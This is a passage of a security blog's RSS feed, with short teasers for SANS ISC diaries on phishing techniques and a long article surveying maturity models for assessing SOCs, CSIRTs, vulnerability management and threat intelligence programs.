        <atom:modified>Wed, 04 Jun 2025 12:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/06/04/hidden-outlook-link/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at an interesting phishing e-mail that hides the link to a malicious site from Oulook users&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/32010&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at an interesting phishing e-mail that hides the link to a malicious site from Oulook users&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Air Bank</category>
            
          
            
              <category>Outlook</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Another day, another phishing campaign abusing google.com open redirects</title>
        <link>https://untrustednetwork.net/en/2025/05/14/google-open-redirect/</link>
        <pubDate>Wed, 14 May 2025 12:30:00 +0100</pubDate>
        
        <atom:modified>Wed, 14 May 2025 12:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/05/14/google-open-redirect/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at an actively exploited open redirect vulnerability in Google Travel service that enables threat actors to craft links pointing to www.google.com which cause redirection to an arbitrary URL&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/31950&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at an actively exploited open redirect vulnerability in Google Travel service that enables threat actors to craft links pointing to &lt;a href=&#34;http://www.google.com&#34;&gt;www.google.com&lt;/a&gt; which cause redirection to an arbitrary URL&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Google</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - It&#39;s 2025... so why are obviously malicious advertising URLs still going strong?</title>
        <link>https://untrustednetwork.net/en/2025/04/21/goolge-ads-phishing/</link>
        <pubDate>Mon, 21 Apr 2025 10:50:00 +0100</pubDate>
        
        <atom:modified>Mon, 21 Apr 2025 10:50:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/04/21/goolge-ads-phishing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a phishing campaign, in which Google Ad service was used for redirection of victims, and at security weaknesses of web-based ad services in general&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/31880&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a phishing campaign, in which Google Ad service was used for redirection of victims, and at security weaknesses of web-based ad services in general&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Google</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - A Tale of Two Phishing Sites</title>
        <link>https://untrustednetwork.net/en/2025/03/28/2-phishing-sites/</link>
        <pubDate>Fri, 28 Mar 2025 13:00:00 +0100</pubDate>
        
        <atom:modified>Fri, 28 Mar 2025 13:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/03/28/2-phishing-sites/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at two phishing sites based on the same phishing kit, that differed significantly (not just) in the level of obfuscation&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/31810&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at two phishing sites based on the same phishing kit, that differed significantly (not just) in the level of obfuscation&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Obfuscation</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Measuring security operations capabilities and improving their maturity, efficiency, and effectiveness</title>
        <link>https://untrustednetwork.net/en/2025/03/04/measuring-secops/</link>
        <pubDate>Tue, 04 Mar 2025 08:00:00 +0100</pubDate>
        
        <atom:modified>Tue, 04 Mar 2025 08:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/03/04/measuring-secops/</guid>
        <description>To slightly paraphrase Peter Drucker’s famous quote, one can’t manage what one can’t measure. This – of course – holds true even for Computer Security Incident Response Teams (CSIRTs) and Security Operations Centers (SOCs). The only question is, how can we “measure” what they do in a meaningful way? This is what we will discuss in this article, which is loosely based on a presentation called ‘How to measure Efficiency in Security Operations’, which I gave at the Open Cyber Security Conference (OSCS) in Tenerife in February of 2024.</description>
        <content:encoded>&lt;p&gt;To slightly paraphrase &lt;a href=&#34;https://en.wikipedia.org/wiki/Peter_Drucker&#34;&gt;Peter Drucker’s&lt;/a&gt; famous quote, one can’t manage what one can’t measure. This – of course – holds true even for Computer Security Incident Response Teams (CSIRTs) and Security Operations Centers (SOCs). The only question is, how can we “measure” what they do in a meaningful way? This is what we will discuss in this article, which is loosely based on a presentation called ‘How to measure Efficiency in Security Operations’, which I gave at the &lt;a href=&#34;https://www.ocsc.info/&#34;&gt;Open Cyber Security Conference (OSCS)&lt;/a&gt; in Tenerife in February of 2024.&lt;/p&gt;
&lt;h3 id=&#34;why-should-we-measure-anything&#34;&gt;Why should we measure anything?&lt;/h3&gt;
&lt;p&gt;To my mind, the aforementioned quote says it all. If something (e.g., a SOC or a CSIRT that is being operated or used by our organization) is basically just a “black box” from which only a report or an alert sometimes emerges, how can we say whether that black box functions efficiently? Worse yet, how can we say whether it fully satisfies the needs of our organization?&lt;br /&gt;
For example, can we be certain that our security monitoring service truly does detect threats relevant to our organization, and does not depend only on generic detection capabilities that ignore our specific threat profile?&lt;/p&gt;
&lt;p&gt;It should be clear that without “measuring” various aspects of CSIRT and SOC operations, there is very little we can be sure of… This is, of course, troubling if relevant security services are provided by an internal department of our own organization, but potentially even more so if the services are being delivered to us by an external MSSP.&lt;br /&gt;
It is therefore in the best interest of any organization that avails itself of security operations services – be they internally or externally provided – to periodically evaluate whether these services function effectively enough to fulfill the corresponding organizational needs.&lt;/p&gt;
&lt;h3 id=&#34;what-do-we-actually-want-to-measure&#34;&gt;What do we actually want to measure?&lt;/h3&gt;
&lt;p&gt;The vaguely defined terms of “Blue Teaming“ or “Security Operations”, which are commonly understood to be the purview of &lt;a href=&#34;https://www.first.org/standards/frameworks/csirts/FIRST-services-framework-team-types-v1.0.pdf&#34;&gt;SOCs, CSIRTs and teams hidden behind various other acronyms&lt;/a&gt;, do – for obvious reasons – mean different things in different organizations. In order for us to have a reasonable starting point for our discussion, we therefore first have to specify which areas we actually want to measure.&lt;/p&gt;
&lt;p&gt;For the sake of simplicity, we will consider “Security Operations” to mean service areas covered by the &lt;a href=&#34;https://www.first.org/standards/frameworks/&#34;&gt;FIRST Services Framework&lt;/a&gt;, i.e., &lt;b&gt;Information Security Event Management, Information Security Incident Management, Vulnerability Management, Situational Awareness&lt;/b&gt; and &lt;b&gt;Knowledge Transfer&lt;/b&gt;. Of course, services provided by a specific SOC, CSIRT or any other “blue team” do not necessarily have to cover all of these areas, however since the activities of some teams do encompass all of them, we will use the Services Framework as our starting point.&lt;/p&gt;
&lt;p&gt;With that out of the way, the time has almost come for us to take a look at how to analyze and measure maturity, efficiency and effectiveness in the various areas that the aforementioned framework covers.&lt;br /&gt;
Before that, however, it’s important to emphasize that security operations rely not only on technology but also on processes and personnel – just like cybersecurity and information security as a whole. And while some organizations tend to see “effectiveness”, “efficiency”, “quality” or “maturity” of their security operations programs mostly as a function of the number and variability of technical security solutions that they have employed, such a view is – for obvious reasons – unacceptably limiting (or “blatantly incorrect”, to put it in more straightforward terms).&lt;/p&gt;
&lt;p&gt;As such, this techno-centric view would hardly lend itself to any reasonable “assessment” or “measurement” of real effectiveness of security operations. Therefore, although we will certainly not disregard technologies in our further discussion, we need to keep in mind the fact that technologies are only one part of the puzzle… And not necessarily always the most important one.&lt;/p&gt;
&lt;h3 id=&#34;how-can-we-actually-measure-security-operations&#34;&gt;How can we actually “measure” security operations?&lt;/h3&gt;
&lt;p&gt;This is the key question.&lt;/p&gt;
&lt;p&gt;One could define and use any number of different metrics, KPIs and SLAs for various areas of security operations (and if you are looking for ideas in this area, try looking at the &lt;a href=&#34;https://www.soc-cmm.com/products/metrics/&#34;&gt;SOC-CMM metrics suite&lt;/a&gt;). However, these probably wouldn’t be of much help if one wanted to measure any of the aforementioned Service Framework areas in a more complex or formal manner.&lt;/p&gt;
&lt;p&gt;For this purpose, one might – of course – develop a custom methodology. However, it may be wiser not to reinvent the wheel if an effective methodology already exists. We will therefore take a look at several methodologies and frameworks for measuring or assessing different areas of security operations that are currently available.&lt;/p&gt;
&lt;p&gt;It should be mentioned that most of these methodologies solve the issue of “how to measure” various aspects of security operations by using some (perhaps simplified or modified) version of the &lt;a href=&#34;https://en.wikipedia.org/wiki/Capability_Maturity_Model_Integration&#34;&gt;CMMI&lt;/a&gt;, and therefore, they can be said to measure maturity of different areas, rather than their efficiency or effectiveness. Nevertheless, since maturity inherently includes efficiency, effectiveness, repeatability, and sustainability, these methodologies are well-suited to our needs.&lt;/p&gt;
&lt;p&gt;Below is a non-exhaustive list of freely available maturity models, methodologies, and relevant frameworks, along with a brief description of their primary purpose, organized by the security operations area they cover. All methodologies and frameworks that are potentially suitable for more than one service area have been listed in the one, in which their use may be considered of most benefit.&lt;/p&gt;
&lt;h3 id=&#34;information-security-event-management&#34;&gt;Information Security Event Management&lt;/h3&gt;
&lt;p&gt;This service area of FIRST Services Framework covers security monitoring and detection and analysis of events, which is usually the domain of Security Operations Centers.&lt;br /&gt;
Although there are various methodologies and frameworks that may be useful in this area (you may find some additional ones in the &lt;a href=&#34;#information-security-incident-management&#34;&gt;Information Security Incident Management section&lt;/a&gt; below, since this area and security event management are umbilically linked), there are two that deserve a special mention.&lt;/p&gt;
&lt;h6 id=&#34;soc-cmm&#34;&gt;SOC-CMM&lt;/h6&gt;
&lt;p&gt;&lt;a href=&#34;https://www.soc-cmm.com/products/soc-cmm/&#34;&gt;SOC-CMM&lt;/a&gt; is undoubtedly the best-known and most commonly used maturity model for SOCs. As you can see from the following picture, it is quite comprehensive – in its current version (2.3), it covers 26 aspects of SOC operations split into 5 domains (Business, People, Process, Technology and Services), and it enables one to evaluate various factors of each of these aspects using a 5-level maturity scale, and some of them (those that fall into the Technology and Services domains) also using a 4-level capability scale.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2025/03-measuring-secops/soc-cmm.png&#34; alt=&#34;SOC-CMM Model&#34; style=&#34;max-width:800px;width:100%;border:1px solid grey&#34;&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: &lt;a href=&#34;https://www.soc-cmm.com/&#34;&gt;SOC-CMM&lt;/a&gt;&lt;/kbd&gt;&lt;/div&gt;
&lt;br&gt;
&lt;p&gt;For practical application, the model is available in the form of a user-friendly Excel assessment tool. Or – rather – two tools, a “Basic” and “Advanced” one. However, the &lt;a href=&#34;https://www.soc-cmm.com/downloads/soc-cmm%202.3.4%20-%20basic.xlsx&#34;&gt;Basic&lt;/a&gt; version is likely the only one you’ll ever need.&lt;/p&gt;
&lt;p&gt;SOC-CMM is quite useful for informal internal evaluations, as well as formal assessments performed by third parties, and it can also be helpful when it comes to &lt;a href=&#34;https://www.soc-cmm.com/products/soctom/&#34;&gt;defining the optimal “target” state of operations&lt;/a&gt; and developing corresponding improvement roadmaps for SOCs.&lt;/p&gt;
&lt;p&gt;In addition to this, a &lt;a href=&#34;https://www.soc-cmm.com/services/certification/&#34;&gt;3-level certification scheme&lt;/a&gt; based on SOC-CMM has been introduced in the final months of 2024, which enables organizations to have their Security Operations Centers officially certified by an accredited certification body. This may be of interest especially to those who feel the need to assure their client base (be it internal or external) of the quality of service provided by their SOC.&lt;/p&gt;
&lt;h6 id=&#34;mitre-attck&#34;&gt;MITRE ATT&amp;amp;CK&lt;/h6&gt;
&lt;p&gt;Given its long history and wide-ranging use in the cyber security community, the &lt;a href=&#34;https://attack.mitre.org/&#34;&gt;MITRE ATT&amp;amp;CK framework&lt;/a&gt; itself requires no introduction. Nevertheless, its potential as a tool for measuring effectiveness of Security Operations Centers does deserve some short explanation, since there is no formal methodology available for this use of ATT&amp;amp;CK.&lt;/p&gt;
&lt;p&gt;In the SOC space, the ATT&amp;amp;CK framework is commonly used for specifying the scope of detection use cases and analytics. Having all relevant detection analytics that a SOC uses mapped to ATT&amp;amp;CK can be quite helpful, since it gives one the ability to effectively measure what (sub-)techniques SOC is capable of detecting, and what (sub-)techniques it most likely can’t detect.&lt;/p&gt;
&lt;p&gt;This can be considered the simplest way to use MITRE ATT&amp;amp;CK in the context of a SOC. However, ATT&amp;amp;CK can also be used to measure security monitoring capabilities and their scope in a more complex way.&lt;/p&gt;
&lt;p&gt;While larger detection coverage (i.e., the range of malicious activities that a SOC is capable of detecting) is generally better, no SOC in the world can effectively cover all (sub-)techniques that are listed in ATT&amp;amp;CK. Therefore, what any SOC should try to implement first and foremost are detections for those malicious activities (i.e., ATT&amp;amp;CK (sub-)techniques) that are most important to its client base.&lt;/p&gt;
&lt;p&gt;Therefore, if one first identifies these activities through an appropriate &lt;a href=&#34;https://tf-csirt.org/wp-content/uploads/2022/09/TF-CSIRT-09-2022-Threat_modeling.pdf&#34;&gt;threat modeling&lt;/a&gt; &lt;a href=&#34;https://ctid.mitre.org/projects/threat-modeling-with-attack&#34;&gt;approach&lt;/a&gt;, one can then quite easily compare the list of ATT&amp;amp;CK (sub-)techniques that the SOC needs to cover – based on the needs of its clients – with the list of (sub-)techniques that it is actually capable of detecting. If coverage of the identified threat model is not close to full, then the SOC is obviously not delivering as effective detection service, as its client base truly needs.&lt;/p&gt;
&lt;p&gt;Using ATT&amp;amp;CK as a basis for an assessment (internal one or one performed by a third party) of detection capabilities and their alignment with client requirements can therefore certainly be helpful. And although – as we have already mentioned – there currently isn’t any formal methodology for this, there is at least a freely available tool named &lt;a href=&#34;https://mitre-attack.github.io/attack-navigator/&#34;&gt;MITRE ATT&amp;amp;CK Navigator&lt;/a&gt;, which can enable us to easily document such an assessment.&lt;/p&gt;
&lt;p&gt;For completeness’s sake, it should be mentioned that alignment of detection capabilities with client needs based on their respective ATT&amp;amp;CK mappings is something that is – to a certain degree – also covered by SOC-CMM .&lt;br /&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&#34;information-security-incident-management&#34;&gt;Information Security Incident Management&lt;/h3&gt;
&lt;p&gt;Security incident management is commonly considered to be the domain of CERTs and CSIRTs. And although one maturity model reigns supreme in this area, we will mention an additional one, since it brings a somewhat different – yet relevant – viewpoint to the table…&lt;/p&gt;
&lt;h6 id=&#34;security-incident-management-maturity-model-sim3&#34;&gt;Security Incident Management Maturity Model (SIM3)&lt;/h6&gt;
&lt;p&gt;Globally, the most well-known methodology for evaluating CSIRTs and CERTs is undoubtedly the Security Incident Management Maturity Model, or &lt;a href=&#34;https://opencsirt.org/csirt-maturity/sim3-and-references/&#34;&gt;SIM3&lt;/a&gt;, which is currently used by FIRST, TF-CSIRT or ENISA – just to name a few.&lt;/p&gt;
&lt;p&gt;In its current version (&lt;a href=&#34;https://opencsirt.org/wp-content/uploads/2023/11/SIM3_v2_interim_standard.pdf&#34;&gt;SIM3 v2 interim&lt;/a&gt;), it consists of 45 “maturity parameters” split into 4 categories (Organization, Human, Tools and Processes) that cover most high-level aspects of security incident management. Evaluation of each parameter is performed using a 5-level maturity scale.&lt;/p&gt;
&lt;p&gt;Probably the easiest way to use the model is with the help of a freely available on-line &lt;a href=&#34;https://sim3-check.opencsirt.org/#/&#34;&gt;SIM3 self-assessment tool&lt;/a&gt;.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2025/03-measuring-secops/sim3.png&#34; alt=&#34;SIM3 Model&#34; style=&#34;max-width:500px;width:100%;border:1px solid grey&#34;&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: &lt;a href=&#34;https://sim3-check.opencsirt.org/#/&#34;&gt;Open CSIRT Foundation&lt;/a&gt;&lt;/kbd&gt;&lt;/div&gt;
&lt;br&gt;
&lt;p&gt;In practice, SIM3 is commonly used for both informal self-assessments as well as formal audits that evaluate whether maturity levels achieved by a specific team reached or exceeded some predetermined “baseline” (e.g., the &lt;a href=&#34;https://www.trusted-introducer.org/processes/certification.html&#34;&gt;Trusted Introducer Certification&lt;/a&gt; process is based on such a formal audit). Overall, the model is quite easy to use, and a quick, informal evaluation of a CSIRT with its help can be done in a few hours (formal assessments, of course, take significantly longer).&lt;/p&gt;
&lt;p&gt;Although in its current form, SIM3 is primarily designed for assessing CSIRTs, it is sometimes also used for evaluation of Security Operations Centers and other types of security teams. And while, at the moment, it may not always be easy to map some aspects of SOC operations to the model, the situation is expected to change in the near future, since the &lt;a href=&#34;https://opencsirt.org/&#34;&gt;Open CSIRT Foundation&lt;/a&gt; is currently in the process of developing modifications of SIM3 (so called “profiles”) intended for SOCs as well as PSIRTs and ISACs, which should significantly simplify application of the model (not just) within the SOC space.&lt;/p&gt;
&lt;h6 id=&#34;crest-cyber-security-incident-response-maturity-assessment&#34;&gt;CREST Cyber Security Incident Response Maturity Assessment&lt;/h6&gt;
&lt;p&gt;The &lt;a href=&#34;https://www.crest-approved.org/buying-building-cyber-services/cyber-security-incident-response-maturity-assessment/&#34;&gt;Cyber Security Incident Response Maturity Assessment (or CSIR Maturity Assessment)&lt;/a&gt;, which was developed by CREST, is another model/methodology useful for assessing incident response teams. However, unlike SIM3, SOC-CMM and most similar models, which evaluate maturity in various general areas that are important for effective SOC or CSIRT work (e.g., personnel situation, overall existence of processes, etc.), the CSIR Maturity Assessment evaluates maturity of organizational capabilities in various stages of incident response lifecycle.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2025/03-measuring-secops/crest-incident.jpeg&#34; alt=&#34;CREST Cyber Security Incident Response Maturity Assessment&#34; style=&#34;max-width:800px;width:100%;border:1px solid grey&#34;&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: &lt;a href=&#34;https://www.crest-approved.org/buying-building-cyber-services/cyber-security-incident-response-maturity-assessment/&#34;&gt;CREST&lt;/a&gt;&lt;/kbd&gt;&lt;/div&gt;
&lt;br&gt;
&lt;p&gt;Two Excel-based maturity assessment tools, both of which use a 5-level maturity scale, are available for practical application of the methodology. One of them is intended for quick, high-level evaluations, and allows users to set a single maturity level for each of the 15 steps of the incident response lifecycle shown above. The second tool is much more detailed, and (similarly to SOC-CMM Excel files) includes multiple questions for each evaluated area.&lt;/p&gt;
&lt;p&gt;For most organizations outside of the United Kingdom, this maturity model will probably be most interesting “only” as a mechanism for informal self-assessments. Nevertheless, it can certainly serve as a useful tool. This holds true even for those who already use SIM3 to assess their CSIRTs, since the CSIR Maturity Assessment is – in its complex version – much more detailed than the aforementioned maturity model, and can therefore provide a more in-depth view into some areas.&lt;br /&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&#34;vulnerability-management&#34;&gt;Vulnerability management&lt;/h3&gt;
&lt;p&gt;While vulnerability management is sometimes the domain of specialized vulnerability management teams, in other cases, performance of corresponding duties falls to a SOC, CSIRT or to a general IT operations department. In any case, evaluating how effectively vulnerability management is performed in the context of an organization can certainly be beneficial.&lt;/p&gt;
&lt;p&gt;To this end, we will mention one maturity model, which deals with this area, and which is probably the most interesting one in this space (that is, if one doesn’t want to go into specifics of bug bounty programs and vulnerability report handling, since there are specialized maturity models for these areas as well).&lt;/p&gt;
&lt;h6 id=&#34;sans-vulnerability-management-maturity-model-vmmm&#34;&gt;SANS Vulnerability Management Maturity Model (VMMM)&lt;/h6&gt;
&lt;p&gt;The &lt;a href=&#34;https://www.sans.org/posters/key-metrics-cloud-enterprise-vmmm/&#34;&gt;VMMM&lt;/a&gt; started its life as “only” a maturity model for vulnerability management programs, without any explicit methodology for its application. Nevertheless, few years after its publication, one of its authors released an accompanying &lt;a href=&#34;https://www.sans.org/blog/vmmm-self-assessment-tool/&#34;&gt;Self-Assessment Tool (VMMM-SAT)&lt;/a&gt; that can guide one in its practical use.&lt;/p&gt;
&lt;p&gt;Overall, the model consists of 5 phases of a vulnerability management lifecycle (Prepare, Identify, Analyze, Communicate and Treat), that are split into 12 areas, that can be measured using a 5-level CMMI-based scale.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2025/03-measuring-secops/vmmm.png&#34; alt=&#34;SANS Vulnerability Management Maturity Model (VMMM)&#34; style=&#34;max-width:400px;width:100%;border:1px solid grey&#34;&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: &lt;a href=&#34;https://www.sans.org/blog/vulnerability-management-maturity-model/&#34;&gt;SANS Institute&lt;/a&gt;&lt;/kbd&gt;&lt;/div&gt;
&lt;br&gt;
&lt;p&gt;The accompanying Self-Assessment Tool is available as an &lt;a href=&#34;https://github.com/jonathanristo/VMMM-self-assessment-tool/tree/main&#34;&gt;Excel document&lt;/a&gt; that enables one to evaluate the 12 areas of the model with the help of approximately 140 yes/no questions.&lt;/p&gt;
&lt;p&gt;As the name of the tool suggests, it – and VMMM itself – is primarily intended/useful for self-assessments, though it can also be helpful in the development of improvement roadmaps for vulnerability management programs.&lt;br /&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&#34;situational-awareness&#34;&gt;Situational Awareness&lt;/h3&gt;
&lt;p&gt;In terms of Security Operations, the topic of situational awareness can be said to be heavily intertwined with Cyber Threat Intelligence (CTI). Given this fact, there are two main maturity models/methodologies that lend themselves to use within this space.&lt;/p&gt;
&lt;h6 id=&#34;crest-cyber-threat-intelligence-maturity-assessment-tools&#34;&gt;CREST Cyber Threat Intelligence Maturity Assessment Tools&lt;/h6&gt;
&lt;p&gt;&lt;a href=&#34;https://www.crest-approved.org/buying-building-cyber-services/cyber-threat-intelligence-maturity-assessment-tools/&#34;&gt;Cyber Threat Intelligence Maturity Assessment Tools&lt;/a&gt; are a set of 3 Excel documents that all implement the same methodology for assessing maturity of CTI programs.&lt;/p&gt;
&lt;p&gt;As you may see in the following picture, the methodology is built around the assessment of four “stages” of an overall “CTI process” (Governance, Program Planning &amp;amp; Requirements, Threat Intelligence Operation and Functional Management), that are further split into 18 “steps”. Each of the areas is evaluated using a 5-level maturity scale.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2025/03-measuring-secops/crest-cti.png&#34; alt=&#34;CREST Cyber Threat Intelligence Maturity Assessment&#34; style=&#34;max-width:800px;width:100%;border:1px solid grey&#34;&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: &lt;a href=&#34;https://www.crest-approved.org/buying-building-cyber-services/cyber-threat-intelligence-maturity-assessment-tools/&#34;&gt;CREST&lt;/a&gt;&lt;/kbd&gt;&lt;/div&gt;
&lt;br&gt;
&lt;p&gt;The reason why CREST published 3 tools for use with the same methodology is that each of the Excel files implements the methodology on a different level of detail. While the “Summary Level” tool only requires answering  two or three questions per each “step”, the “Intermediate Level” tool might require answering five or six questions, and the “Detailed Level” tool might go well over twenty questions in some cases. One can therefore always choose the right tool based on the need for detail and the available time.&lt;/p&gt;
&lt;p&gt;The assessment tools may be quite useful for performing self-assessments, however they (especially the two more detailed tools) may also be interesting for conducting third-party assessments.&lt;/p&gt;
&lt;h6 id=&#34;cyber-threat-intelligence-capability-maturity-model-cti-cmm&#34;&gt;Cyber Threat Intelligence Capability Maturity Model (CTI-CMM)&lt;/h6&gt;
&lt;p&gt;The &lt;a href=&#34;https://cti-cmm.org/&#34;&gt;CTI-CMM&lt;/a&gt; is a relatively recent maturity model that is heavily influenced by the &lt;a href=&#34;https://c2m2.doe.gov/&#34;&gt;C2M2&lt;/a&gt; framework and stresses the need for alignment of a CTI program with stakeholder/client needs.&lt;br /&gt;
In its current version (&lt;a href=&#34;https://img1.wsimg.com/blobby/go/9aad51ed-ae49-4d8d-ba52-3af7e504ddf1/downloads/eeb42955-032f-4623-be30-1d0aaaf00607/CTI-CMM book Version 1.1.pdf&#34;&gt;1.1&lt;/a&gt;), it is organized into 11 domains that are evaluated using a 4-level maturity scale.&lt;/p&gt;
&lt;p&gt;For practical application of the model, a &lt;a href=&#34;https://cti-cmm.org/beta-assessment-tool&#34;&gt;“Beta” assessment tool&lt;/a&gt; is currently available in the form of an Excel document, that enables one to evaluate a CTI program through specifying the current maturity level in a total of 230 measured areas.&lt;/p&gt;
&lt;p&gt;The model may be useful for performing self-assessment of a CTI team (or SOC/CSIRT that delivers CTI-related services) or for development of an improvement roadmap for a CTI program.&lt;br /&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&#34;knowledge-transfer&#34;&gt;Knowledge Transfer&lt;/h3&gt;
&lt;p&gt;Although this area is part of the FIRST Services Framework, it is commonly the domain of security awareness and education specialists and exercise developers, rather than SOCs or CSIRTs. As such, it is somewhat outside of the scope we usually wish to evaluate when it comes to security operations efficiency or maturity. Nevertheless, should you require some basic model or methodology to assess how a certain organization/team is performing in at least some parts of this service area, the &lt;a href=&#34;https://www.knowbe4.com/security-culture-maturity-model&#34;&gt;Security Culture Maturity Model&lt;/a&gt; or the &lt;a href=&#34;https://www.sans.org/security-awareness-training/resources/maturity-model/&#34;&gt;SANS Security Awareness Maturity Model&lt;/a&gt; may be of use to you.&lt;/p&gt;
&lt;h3 id=&#34;where-should-we-start&#34;&gt;Where should we start?&lt;/h3&gt;
&lt;p&gt;With the number of various methodologies shown above, one can almost feel spoiled for choice, and it can be quite difficult to identify an optimal starting point/optimal methodology to start with.&lt;/p&gt;
&lt;p&gt;Although the “right” methodology will – of course – depend on the specific service areas one wishes to assess, an approach that has worked for me quite well in the past, when I needed to “somehow” assess a SOC or a CSIRT (or another team that performs at least some level of security monitoring and incident response), was to do a quick assessment using SIM3, followed by a more in-depth analysis with the help of SOC-CMM.&lt;/p&gt;
&lt;p&gt;Therefore, if you don’t know where to start, feel free to use this approach. Though, as you can clearly see, it is far from the only one available to you…&lt;/p&gt;
&lt;p&gt;And should you need any help with assessing your SOC or CSIRT, don&amp;rsquo;t hesitate to &lt;a href=&#34;https://nettles.cz/security/contact/&#34;&gt;reach out&lt;/a&gt; – it is something we do for our clients regularly as part of our services at &lt;a href=&#34;https://www.nettles.cz/security/&#34;&gt;Nettles Consulting&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.net/images/2025/03-measuring-secops/sim3.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SOC-CMM</category>
            
          
            
              <category>SIM3</category>
            
          
            
              <category>CREST</category>
            
          
            
              <category>FIRST</category>
            
          
            
              <category>SOC</category>
            
          
            
              <category>CSIRT</category>
            
          
            
              <category>SANS</category>
            
          
            
              <category>Incident Response</category>
            
          
            
              <category>Security Operations</category>
            
          
            
              <category>Vulnerability Management</category>
            
          
            
              <category>CTI</category>
            
          
            
              <category>Metrics</category>
            
          
            
              <category>ATT&amp;CK</category>
            
          
        
        
          
            
              <category>2025</category>
            
          
        
        
      </item>
      
      <item>
        <title>10 years of Untrusted Network</title>
        <link>https://untrustednetwork.net/en/2025/03/03/10-years/</link>
        <pubDate>Mon, 03 Mar 2025 07:10:00 +0100</pubDate>
        
        <atom:modified>Mon, 03 Mar 2025 07:10:00 +0100</atom:modified>
